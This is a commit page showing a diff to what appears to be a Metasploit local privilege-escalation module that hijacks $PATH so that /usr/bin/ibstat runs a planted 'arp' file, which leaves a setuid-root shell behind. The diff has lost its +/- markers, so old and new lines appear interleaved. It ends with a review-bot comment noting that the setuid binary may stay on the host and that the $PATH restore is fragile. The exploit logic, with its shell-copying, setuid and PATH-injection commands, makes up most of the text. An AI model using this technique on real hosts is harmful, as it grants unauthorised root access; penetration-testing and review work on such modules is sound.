Fix $PATH issues. Add FileDropper functionality

bug/bundler_fix
Sagi Shahar 2014-03-02 20:43:17 +02:00
parent e6c1dd3f9e
commit a005d69b16
1 changed files with 6 additions and 5 deletions


@ -7,6 +7,7 @@ class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info,
@ -90,23 +91,23 @@ chmod 4555 #{root_file}
print_status("Compiling source...")
cmd_exec "gcc -o #{root_file} #{root_file}.c"
print_status("Compilation completed")
print_status("Deleting source...")
file_rm("#{root_file}.c")
register_file_for_cleanup("#{root_file}.c")
else
cmd_exec "cp /bin/sh #{root_file}"
end
print_status("Writing custom arp file...")
write_file("#{arp_file}",arp)
register_file_for_cleanup("#{arp_file}")
cmd_exec "chmod 0555 #{arp_file}"
print_status("Custom arp file written")
print_status("Updating $PATH environment variable...")
path_env = cmd_exec 'echo $PATH'
cmd_exec 'PATH=.:$PATH'
cmd_exec "PATH=#{datastore["WritableDir"]}:$PATH"
cmd_exec 'export PATH'
print_status("Triggering vulnerablity...")
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
print_status("Removing custom arp...")
file_rm("#{arp_file}")
# The $PATH variable must be restored before the payload is executed
# in cases where an euid root shell was gained
print_status('Restoring $PATH environment variable...')
cmd_exec "PATH=#{path_env}"
cmd_exec 'export PATH'
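Review bot: The visible lines register `#{root_file}.c` and `#{arp_file}` for cleanup but not `root_file` itself, which the hunk-header context (`chmod 4555 #{root_file}`) suggests is made setuid. Unless it is removed outside this hunk, a setuid-root binary stays on the assessed host after the run; adding `register_file_for_cleanup(root_file)` next to the other registrations would close that gap. The restore step `cmd_exec "PATH=#{path_env}"` is also unquoted, and nothing visible restores `$PATH` if a step between the change and the restore fails, so the session can be left with the writable directory at the front of its search path. The enclosing method starts and ends outside the hunk, and the +/- markers are lost on this page, so both points should be checked against the full file.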